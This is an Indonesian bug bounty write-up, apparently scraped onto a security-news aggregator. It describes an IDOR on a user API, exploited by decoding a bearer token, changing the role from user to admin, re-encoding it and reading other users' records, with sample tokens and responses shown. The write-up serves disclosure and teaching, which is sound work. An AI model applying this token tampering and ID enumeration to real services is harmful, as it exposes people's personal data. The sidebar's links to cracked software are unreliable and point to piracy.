LEFT SIDEBAR AD

Hidden in mobile, Best for skyscrapers.

Privilege Escalation Lead to Data Breach

1 year ago 84
BOOK THIS SPACE FOR AD
ARTICLE AD

Assalamualaikum, Bug Hunter!
Bagaimana Kabarnya ? Semoga Baik-baik saja ya, kali ini saya mau membuat Write Up yang menurut saya Bug ini sangat Menarik untuk dibahas.

Awalnya saya mencoba cari celah di berbagai fitur salahsatunya letak celah keamanan yang sangat sering terjadi Data Breach yaitu IDOR atau insecure direct object reference yang mana celah keamanan ini sangat rentan dieksploitasi, jadi untuk skema penyerangannya seperti ilustrasi dibawah ini :

IDOR

Seperti yang yang tertera pada gambar diatas, setiap akun users memiliki ID yang didalam ID tersebut tersimpan berbagai Object seperti Nama, Alamat, Email, Nomor HP dll. Misalnya ketika users membuka halaman Profil, itu terdapat ID seperti contoh :
https://example.com/users?id=1

Nah, biasanya attacker mencoba untuk mengulik ID tersebut dengan mengubahnya seperti berikut :
https://example.com/users?id=2
dan apabila halaman tersebut menampilkan data users lain yang memiliki id 2 disinilah letak celah keamanan tersebut.

Melakukan Penyerangan

Baik, disini saya mencoba membuka halaman profile dan mendapatkan Request yang mengarah ke Endpoint GET /api/v1/users/me dengan menampilkan data :

{“id”:1337, “role”:”user”, “name”:”attacker”, “email”:”attacker@evil.net”}

Kemudian, saya mencoba untuk mengubah Request yang mengarah ke Endpoint GET /api/v1/users/me menjadi GET /api/v1/users?id=123 dan menampilkan Response seperti berikut :

{“status”:403, “error”:true, “message”:”anda tidak memiliki hak akses administrator”}

Oke, tidak apa untuk memecahkan masalah ini, ternyata pada Request Header terdapat Authorization Bearer yang kurang lebih isinya seperti berikut :

eyJpZCI6MTMzNywgInJvbGUiOiJ1c2VyIiwgIm5hbWUiOiJhdHRhY2tlciIsICJlbWFpbCI6ImF0dGFja2VyQGV2aWwubmV0In0.XXXXXXXXXXXXXXXXX

Apabila di Decode maka hasilnya seperti berikut :

{“id”:1337, “role”:”user”, “name”:”attacker”, “email”:”attacker@evil.net”}

Nah, awalnya saya gak kepikiran untuk mengubah “role”:”user” menjadi “role”:”admin”, pada akhirnya saya mencoba untuk mengubah Authorization yang berisi :

{“id”:1337, “role”:”user”, “name”:”attacker”, “email”:”attacker@evil.net”}

Menjadi :

{“id”:1337, “role”:”admin”, “name”:”attacker”, “email”:”attacker@evil.net”}

Lalu, saya encode kembali dan jadilah Authorization Bearer seperti berikut :

eyJpZCI6MTMzNywgInJvbGUiOiJhZG1pbiIsICJuYW1lIjoiYXR0YWNrZXIiLCAiZW1haWwiOiJhdHRhY2tlckBldmlsLm5ldCJ9.XXXXXXXXXXXXXXXXX

Kemudian, saya coba untuk mengakses Endpoint GET /api/v1/users?id=123, dan ketika Request tersebut dijalankan, pada Response menampilkan data :

{“id”:123, “role”:”user”, “name”:”XXX”, “email”:”XXX@XXX.XXX”}

Semoga Informasi ini bermanfaat yaa!

Read Entire Article
  3. Privilege Escalation Lead to Data Breach

Related

Unraveling the Web of Price Manipulation Safeguarding Fairness in Markets

Unraveling the Web of Price Manipulation Safeguarding Fairness in Markets

Unveiling Order Processing Vulnerabilities Protecting Your Business in the Digital Era

Unveiling Order Processing Vulnerabilities Protecting Your Business in the Digital Era

5 bugs in one program $$$

5 bugs in one program $$$

Multiple Business Logic Errors in APPLE music/TV allowing bypass of parental controls

Multiple Business Logic Errors in APPLE music/TV allowing bypass of parental controls

Gaining Control: How Response Manipulation Leads to Higher Privileges (PoC)

Gaining Control: How Response Manipulation Leads to Higher Privileges (PoC)

A Arte de Explorar SQL Injection: Uma abordagem profunda

A Arte de Explorar SQL Injection: Uma abordagem profunda

Trending

1. Chelsea
2. Man United vs Newcastle
3. Sandeep Lamichhane
4. Slovakia
5. Dhruv Jurel
6. RBSE 10th Result 2024
7. Arsenal
8. Madhavi Raje
9. Last of Us
10. Ilya Sutskever OpenAI

Popular

1-click RCE in Electron Applications

1-click RCE in Electron Applications

Install waybackurls on Kali Linux

Install waybackurls on Kali Linux

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Install DalFox on Kali Linux

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

BOOK THIS SPACE FOR AD
RIGHT SIDEBAR BOTTOM AD
Bengali (Bangladesh) Bengali (Bangladesh) · English (United States) English (United States) ·
About Us · Terms & Condition · Contact Us
© Security Alert 2024. All rights are reserved